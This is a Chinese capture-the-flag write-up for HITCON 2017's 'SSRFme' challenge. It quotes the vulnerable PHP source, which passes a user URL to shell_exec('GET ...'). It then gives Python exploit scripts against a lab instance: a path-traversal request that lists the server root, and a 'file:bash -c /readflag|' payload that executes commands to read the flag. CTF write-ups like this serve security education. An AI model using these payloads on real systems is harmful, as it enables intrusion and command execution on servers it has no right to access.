[HITCON 2017]SSRFme

题目源码

122.192.27.100 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));//删去filename变量中的..以防止目录穿越
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

流程
sandbox为md5(orange122.192.27.100)
从url中读取命令，使用shell_exec执行
将shell_exec函数执行后的结果写入filename输入的文件名中
脚本来自https://momomoxiaoxi.com/2017/11/08/HITCON/

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = '../../../../../'
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'

r = requests.get(url = url+payload.format(exp)) #先执行命令，写入data中
r = requests.get(url+see) #读取data文件
print(r.text)

<HTML>
<HEAD>
<TITLE>Directory ../../../../../</TITLE>
<BASE HREF="file:../../../../../">
</HEAD>
<BODY>
<H1>Directory listing of ../../../../../</H1>
<UL>
<LI><A HREF="./">./</A>
<LI><A HREF="../">../</A>
<LI><A HREF=".dockerenv">.dockerenv</A>
<LI><A HREF="bin/">bin/</A>
<LI><A HREF="boot/">boot/</A>
<LI><A HREF="dev/">dev/</A>
<LI><A HREF="etc/">etc/</A>
<LI><A HREF="flag">flag</A>
<LI><A HREF="home/">home/</A>
<LI><A HREF="lib/">lib/</A>
<LI><A HREF="lib64/">lib64/</A>
<LI><A HREF="media/">media/</A>
<LI><A HREF="mnt/">mnt/</A>
<LI><A HREF="opt/">opt/</A>
<LI><A HREF="proc/">proc/</A>
<LI><A HREF="readflag">readflag</A>
<LI><A HREF="root/">root/</A>
<LI><A HREF="run/">run/</A>
<LI><A HREF="sbin/">sbin/</A>
<LI><A HREF="srv/">srv/</A>
<LI><A HREF="start.sh">start.sh</A>
<LI><A HREF="sys/">sys/</A>
<LI><A HREF="tmp/">tmp/</A>
<LI><A HREF="usr/">usr/</A>
<LI><A HREF="var/">var/</A>
</UL>
</BODY>
</HTML>

读取readflag文件，使用ida64进行分析，进去直接F5

使用readflag读取flag
这里使用bash -c readflag读取，其作用相当于./readflag
图片来自https://blog.csdn.net/SopRomeo/article/details/106013885

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = 'file:bash -c /readflag|' #不加管道符好像不会创建文件
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'

r = requests.get(url = url+payload.format(exp))
r = requests.get(url+see)
print(r.text)

posted @ 2020-09-16 19:18 山野村夫z1 阅读(767) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

山野村夫的博客

[HITCON 2017]SSRFme

公告